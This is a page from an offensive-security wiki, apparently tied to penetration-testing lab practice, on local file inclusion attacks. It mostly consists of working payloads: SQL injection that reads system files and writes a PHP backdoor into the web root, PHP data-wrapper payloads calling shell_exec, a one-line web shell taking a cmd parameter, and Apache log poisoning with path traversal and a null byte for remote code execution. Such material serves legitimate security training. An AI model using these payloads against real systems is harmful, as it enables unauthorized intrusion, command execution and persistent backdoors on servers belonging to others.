> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/web-application-hacking/web-techniques/file-and-resource-attacks/lfi.md).

# LFI

## Basic RCE Example:

{% tabs %}
{% tab title="LFI Read" %}
If you have SQLi or can modify templates, see if you can read a system file. If this works you can try for rce. (in this case its windows with apache):

<mark style="color:green;"><http://192.168.11.35/comment.php?id=-1> union select all 1,2,3,4,load\_file('c:/windows/system32/drivers/etc/host'),6</mark>
{% endtab %}

{% tab title="LFI RCE" %}
Find a place to upload the *backdoor.php* file or inject it with SQLi. Then use the LFI to run it on system and get RCE.&#x20;

<mark style="color:green;"><http://10.11.1.35/comment.php?id=738> union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'</mark>
{% endtab %}
{% endtabs %}

![Backdoor RCE via LFI read
&#x20;](/files/-McqoroYVQKXRWf3oRpS)

## **PHP WRAPPERS:**

#### Example 1:

<mark style="color:green;"><http://10.11.0.22/menu.php?file=></mark><mark style="color:green;">**data:text/plain,hello world**</mark>

![](/files/-Mcqoveib5y_XjXQNcrA)

**T**he menu page is vulnerable to LFI attacks. If we submit a payload using a data\
&#x20;wrapper, the application should treat it the text the same as a regular file and include it in the page.\
\
&#x20;<mark style="color:green;"><http://10.11.0.22/menu.php?file=></mark><mark style="color:green;">**data:text/plain,\<?php echo shell\_exec("dir") ?>**</mark>

{% hint style="info" %}
Often encodings are combined with this method. Below are a couple sources to get you started. <https://github.com/cyberheartmi9/PayloadsAllTheThings/blob/master/File%20Inclusion%20-%20Path%20Traversal/README.md>

<https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/>
{% endhint %}

\
**EXAMPLE:**
------------

Found this code on the site:<br>

![](/files/-Mcqp-ooDOGGRxumNGp4)

include: Used to load files, (php files in this case) from the server locally and run them.\
\
In this case we can submit something other than en,fr,etc and have the server request other files. We test a common windows file to make sure our traversal works.

![](/files/-Mcqp2izb400TT48Gq00)

A null byte `%00` is used to stop the code from trying to append the php extension via the include statement.<br>

### Log File Poison RCE:

One way to get RCE with LFI is by poisoning a log file with php then displaying the file in the browser so the php is executed. We can do this by making a bad request with nc that contains our code and then read back the log with apache php.<br>

![](/files/-Mcqp5qU7CzRpA0MHdxF)

{% hint style="info" %}
Try other php shells if this does not work. It may also need the use of a pre tag to keep spacing. ex: <mark style="color:green;">\<?php echo '\<pre>' . shell\_exec($\_GET\['cmd']) . '\</pre>';?></mark>
{% endhint %}

This causes our request to get logged at : `c:\xampp\apache\logs\access.log`

{% hint style="warning" %}
`Match your log file type/path to the server you are attacking.`
{% endhint %}

#### Running the RCE:

<mark style="color:green;"><http://10.11.1.35/addguestbook.php?cmd=ipconfig\\&LANG=../../../../../../../xampp/apache/logs/access.log%00></mark>

![Log file holds our rce output](/files/-Mcqp9hdO3isIzGXbg5g)

Commands will be executed with the apache privs. From here a more persistent shell/backdoor can be established.
